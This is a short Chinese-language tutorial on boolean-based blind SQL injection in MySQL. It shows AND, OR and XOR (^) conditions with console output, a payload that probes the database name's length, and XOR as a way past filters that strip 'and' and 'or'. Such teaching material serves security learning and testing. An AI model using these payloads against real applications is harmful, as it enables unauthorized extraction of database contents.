基于布尔的盲注是在这样的一种情况下使用:页面虽然不能返回查询的结果,但是对于输入 布尔值 0 和 1 的反应是不同的,那我们就可以利用这个输入布尔值的注入点来注入我们的条件语句,从而能根据页面的返回情况推测出我们输入的语句是否正确(输入语句的真假直接影响整条查询语句最后查询的结果的真假)

1.使用and

  1. mysql> select * from user where id ='1' and 1=1;
  2. +----+----------+----------+
  3. | id | username | password |
  4. +----+----------+----------+
  5. |  1 | test     | 123456   |
  6. +----+----------+----------+
  7. 1 row in set (0.00 sec)
  9. mysql> select * from user where id ='1' and 1=2;
  10. Empty set (0.00 sec)

将and后面的语句替换为注入的语句,例如:

  1. (select length(database()))>1

当两边语句查询结果都为真时,网页会返回正常结果。

2.使用or

与and相同,就是逻辑与和逻辑或的关系

  1. mysql> select * from user where id = '1' or 1=2;
  2. +----+----------+----------+
  3. | id | username | password |
  4. +----+----------+----------+
  5. |  1 | test     | 123456   |
  6. +----+----------+----------+
  7. 1 row in set (0.00 sec)
  9. mysql> select * from user where id = '0' or 1=2;
  10. Empty set (0.00 sec)

3.使用^

有时候and、or之类的关键字会被过滤,而^就可以派上用场了,而且使用频率很高。

  1. mysql> select * from user where id = 1 ^ 0;
  2. +----+----------+----------+
  3. | id | username | password |
  4. +----+----------+----------+
  5. |  1 | test     | 123456   |
  6. +----+----------+----------+
  7. 1 row in set (0.00 sec)
  9. mysql> select * from user where id = 1 ^ 1;
  10. Empty set (0.00 sec)

实际应用:

  1. mysql> select * from user where id = 1 ^ ((select length(database()))>19);
  2. +----+----------+----------+
  3. | id | username | password |
  4. +----+----------+----------+
  5. |  1 | test     | 123456   |
  6. +----+----------+----------+
  7. 1 row in set (0.00 sec)
  9. mysql> select * from user where id = 1 ^ ((select length(database()))>10);
  10. Empty set (0.00 sec)